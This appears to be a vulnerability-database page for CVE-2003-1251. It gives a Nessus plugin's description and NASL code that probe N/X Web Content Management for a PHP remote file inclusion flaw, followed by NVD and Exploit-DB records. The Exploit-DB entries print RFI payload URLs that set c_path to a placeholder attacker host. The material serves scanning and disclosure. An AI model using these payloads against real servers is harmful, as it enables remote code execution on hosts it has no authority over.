N/X Web Content Management Multiple Script Remote File Inclusion
2003-02-17T00:00:00
ID NX_WEB_CONTENT_FILE_INCLUDE.NASL Type nessus Reporter This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2003-02-17T00:00:00
Description
It is possible to make the remote host include PHP files hosted on a
third-party server using N/X Web content management system.
An attacker may use this flaw to inject arbitrary code in the remote
host and gain a shell with the privileges of the web server.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(11233);
script_version("1.25");
script_cve_id("CVE-2003-1251");
script_bugtraq_id(6500);
script_name(english:"N/X Web Content Management Multiple Script Remote File Inclusion");
script_summary(english:"Checks for the presence of menu.inc.php");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple remote file include vulnerabilities." );
script_set_attribute(attribute:"description", value:
"It is possible to make the remote host include PHP files hosted on a
third-party server using N/X Web content management system.
An attacker may use this flaw to inject arbitrary code in the remote
host and gain a shell with the privileges of the web server." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Jan/7" );
script_set_attribute(attribute:"solution", value:"Unknown at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:W/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2003-1251");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/02/17");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"CGI abuses");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("www/PHP");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if(!can_host_php(port:port)) exit(0);
function check(loc)
{
local_var w, r;
w = http_send_recv3(method: "GET", item:string(loc, "/nx/common/cds/menu.inc.php?c_path=http://example.com/"), port:port);
if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
r = strcat(w[0], w[1], '\r\n', w[2]);
if(egrep(pattern:".*http://example.com//?common/lib.*\.php.*", string:r))
{
security_hole(port);
exit(0);
}
}
check(loc:"");
foreach dir (cgi_dirs())
{
check(loc:dir);
}
{"id": "NX_WEB_CONTENT_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "N/X Web Content Management Multiple Script Remote File Inclusion", "description": "It is possible to make the remote host include PHP files hosted on a\nthird-party server using N/X Web content management system. \n\nAn attacker may use this flaw to inject arbitrary code in the remote\nhost and gain a shell with the privileges of the web server.", "published": "2003-02-17T00:00:00", "modified": "2003-02-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11233", "reporter": "This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://seclists.org/bugtraq/2003/Jan/7"], "cvelist": ["CVE-2003-1251"], "type": "nessus", "lastseen": "2021-01-20T12:24:11", "edition": 25, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1251"]}, {"type": "exploitdb", "idList": ["EDB-ID:22115", "EDB-ID:22116"]}], "modified": "2021-01-20T12:24:11", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-20T12:24:11", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11233);\n script_version(\"1.25\");\n\n script_cve_id(\"CVE-2003-1251\");\n script_bugtraq_id(6500);\n\n script_name(english:\"N/X Web Content Management Multiple Script Remote File Inclusion\");\n script_summary(english:\"Checks for the presence of menu.inc.php\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to make the remote host include PHP files hosted on a\nthird-party server using N/X Web content management system. \n\nAn attacker may use this flaw to inject arbitrary code in the remote\nhost and gain a shell with the privileges of the web server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2003/Jan/7\" );\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:W/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:W/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2003-1251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/02/17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nfunction check(loc)\n{\n local_var w, r;\n\n w = http_send_recv3(method: \"GET\", item:string(loc, \"/nx/common/cds/menu.inc.php?c_path=http://example.com/\"), port:port);\n if (isnull(w)) exit(1, \"The web server on port \"+port+\" did not answer\");\n r = strcat(w[0], w[1], '\\r\\n', w[2]);\n if(egrep(pattern:\".*http://example.com//?common/lib.*\\.php.*\", string:r))\n {\n security_hole(port);\n exit(0);\n }\n}\n\ncheck(loc:\"\");\nforeach dir (cgi_dirs())\n{\n check(loc:dir);\n}\n", "naslFamily": "CGI abuses", "pluginID": "11233", "cpe": [], "scheme": null, "cvss3": {"score": 8.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"}}
{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "The (1) menu.inc.php, (2) datasets.php and (3) mass_operations.inc.php (mistakenly referred to as mass_opeations.inc.php) scripts in N/X 2002 allow remote attackers to execute arbitrary PHP code via a c_path that references a URL on a remote web server that contains the code.", "edition": 3, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1251", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1251"], "modified": "2008-09-05T20:36:00", "cpe": ["cpe:/a:nx:n_x_web_content_management_system_2002:prerelease1"], "id": "CVE-2003-1251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1251", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nx:n_x_web_content_management_system_2002:prerelease1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T18:00:23", "description": "N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI. CVE-2003-1251. Webapps exploit for php platform", "published": "2003-01-02T00:00:00", "type": "exploitdb", "title": "N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1251"], "modified": "2003-01-02T00:00:00", "id": "EDB-ID:22115", "href": "https://www.exploit-db.com/exploits/22115/", "sourceData": "source: http://www.securityfocus.com/bid/6500/info\r\n\r\nN/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.\r\n\r\nAn attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.\r\n\r\nIf the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. \r\n\r\nhttp://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/\r\nwith :\r\nhttp://[attacker]/common/lib/launch.inc.php", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22115/"}, {"lastseen": "2016-02-02T18:00:32", "description": "N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI. CVE-2003-1251. Webapps exploit for php platform", "published": "2003-01-02T00:00:00", "type": "exploitdb", "title": "N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1251"], "modified": "2003-01-02T00:00:00", "id": "EDB-ID:22116", "href": "https://www.exploit-db.com/exploits/22116/", "sourceData": "source: http://www.securityfocus.com/bid/6500/info\r\n \r\nN/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.\r\n \r\nAn attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.\r\n \r\nIf the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. \r\n\r\nhttp://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/\r\nwith :\r\nhttp://[attacker]/common/dbo/saveset.php\r\nhttp://[attacker]/common/dbo/recordset.php\r\nhttp://[attacker]/common/dbo/deleteset.php\r\nhttp://[attacker]/common/dbo/updateset.php\r\nhttp://[attacker]/common/dbo/insertset.php ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22116/"}]}
